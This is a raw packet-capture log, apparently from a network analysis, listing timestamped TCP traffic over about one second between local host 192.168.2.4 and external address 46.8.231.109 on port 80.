Oct 2, 2024 09:41:26.995968103 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.995968103 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.995968103 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.995968103 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.996014118 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.996045113 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.996045113 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.996046066 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.996082067 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.996097088 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.996129036 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.996160030 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.996191025 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.996239901 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.996270895 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.996289015 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.996289015 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.996289015 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.996289968 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.996289968 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.996304035 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.996335030 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.996366978 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.996397972 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.996428967 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.996433973 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.996433973 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.996433973 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.996433973 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.996433973 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.996478081 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.996510983 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.996526003 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.996542931 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.996575117 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.996606112 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.996637106 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.996639967 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.996639967 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.996685982 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.996685982 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.996721983 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.996752977 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.996786118 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.996817112 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.996844053 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.996844053 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.996844053 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.996849060 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.996857882 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.996880054 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.996912003 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.996944904 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.996977091 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.997008085 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.997040033 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.997051001 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.997051001 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.997051001 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.997051001 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.997051001 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.997051001 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.997071981 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.997103930 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.997136116 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.997184992 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.997221947 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.997253895 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.997262955 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.997262955 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.997262955 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.997262955 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.997262955 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.997262955 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.997286081 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.997332096 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.997380972 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.997412920 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.997445107 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.997476101 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.997483969 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.997483969 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.997483969 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.997483969 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.997483969 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.997483969 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.997507095 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.997539043 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.997586966 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.997617960 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.997648954 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.997680902 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.997688055 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.997688055 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.997688055 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.997688055 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.997688055 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.997688055 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.997730017 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.997761965 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.997797012 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.997828960 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.997859955 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.997870922 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.997870922 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.997870922 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.997870922 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.997870922 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.997891903 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.997924089 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.997956038 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.997983932 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.998014927 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.998047113 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.998054028 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.998054028 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.998054028 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.998054028 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.998054028 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.998054028 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.998078108 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.998110056 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.998141050 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.998173952 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.998204947 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.998236895 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.998248100 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.998248100 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.998248100 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.998248100 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.998248100 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.998248100 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.998269081 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.998301029 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.998332977 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.998364925 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.998397112 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.998430014 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.998436928 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.998436928 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.998436928 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.998436928 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.998436928 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.998436928 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.998461962 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.998493910 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.998527050 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.998558044 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.998589993 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.998621941 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.998631001 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.998631001 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.998631001 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.998631001 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.998631001 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.998631001 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.998653889 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.998686075 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.998717070 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.998749971 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.998783112 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.998816013 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.998847961 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.998863935 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.998894930 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.998900890 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.998900890 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.998902082 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.998902082 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.998902082 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.998902082 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.998925924 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.998925924 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.998925924 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.998929977 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.998963118 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.998995066 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.999001026 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.999001026 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.999030113 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.999062061 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.999093056 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.999125957 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.999152899 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.999185085 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.999216080 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.999248028 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.999280930 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.999291897 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.999291897 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.999293089 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.999293089 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.999293089 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.999293089 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.999313116 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.999345064 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.999377966 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.999414921 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.999414921 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.000264883 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.084078074 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.084131956 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.084165096 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.084213972 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.084247112 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.084296942 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.084315062 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.084315062 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.084315062 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.084328890 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.084342003 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.084379911 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.084384918 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.084429979 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.084461927 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.084494114 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.084542036 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.084574938 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.084605932 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.084659100 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.084711075 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.084743023 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.084774971 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.084788084 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.084788084 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.084788084 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.084788084 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.084788084 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.084788084 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.084825039 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.084856987 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.084888935 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.084920883 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.084971905 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.085002899 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.085035086 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.085067034 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.085105896 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.085105896 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.085105896 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.085105896 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.085105896 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.085105896 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.085114956 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.085148096 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.085179090 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.085227966 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.085259914 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.085293055 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.085325003 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.085355043 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.085391045 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.085422993 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.085432053 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.085432053 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.085432053 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.085432053 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.085450888 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.085450888 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.085473061 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.085505009 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.085536003 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.085566998 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.085598946 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.085608006 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.085608006 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.085608006 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.085608006 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.085629940 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.085680008 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.085711002 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.085748911 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.085748911 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.085748911 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.085748911 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.085783005 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.085832119 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.085865021 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.085912943 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.085938931 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.085938931 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.085947037 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.085979939 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.086010933 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.086041927 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.086074114 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.086105108 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.086136103 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.086169004 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.086199999 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.086206913 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.086206913 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.086206913 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.086206913 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.086206913 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.086206913 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.086232901 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.086263895 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.086296082 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.086344004 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.086378098 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.086409092 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.086441040 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.086472988 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.086503983 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.086535931 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.086575985 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.086575985 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.086575985 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.086575985 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.086576939 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.086576939 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.086585999 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.086616993 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.086648941 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.086680889 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.086711884 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.086743116 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.086775064 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.086807966 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.086839914 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.086889029 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.086920977 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.086929083 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.086929083 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.086929083 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.086929083 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.086929083 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.086929083 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.086951971 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.086985111 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.087025881 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.087059021 CEST	80	49749	46.8.231.109	192.168.2.4
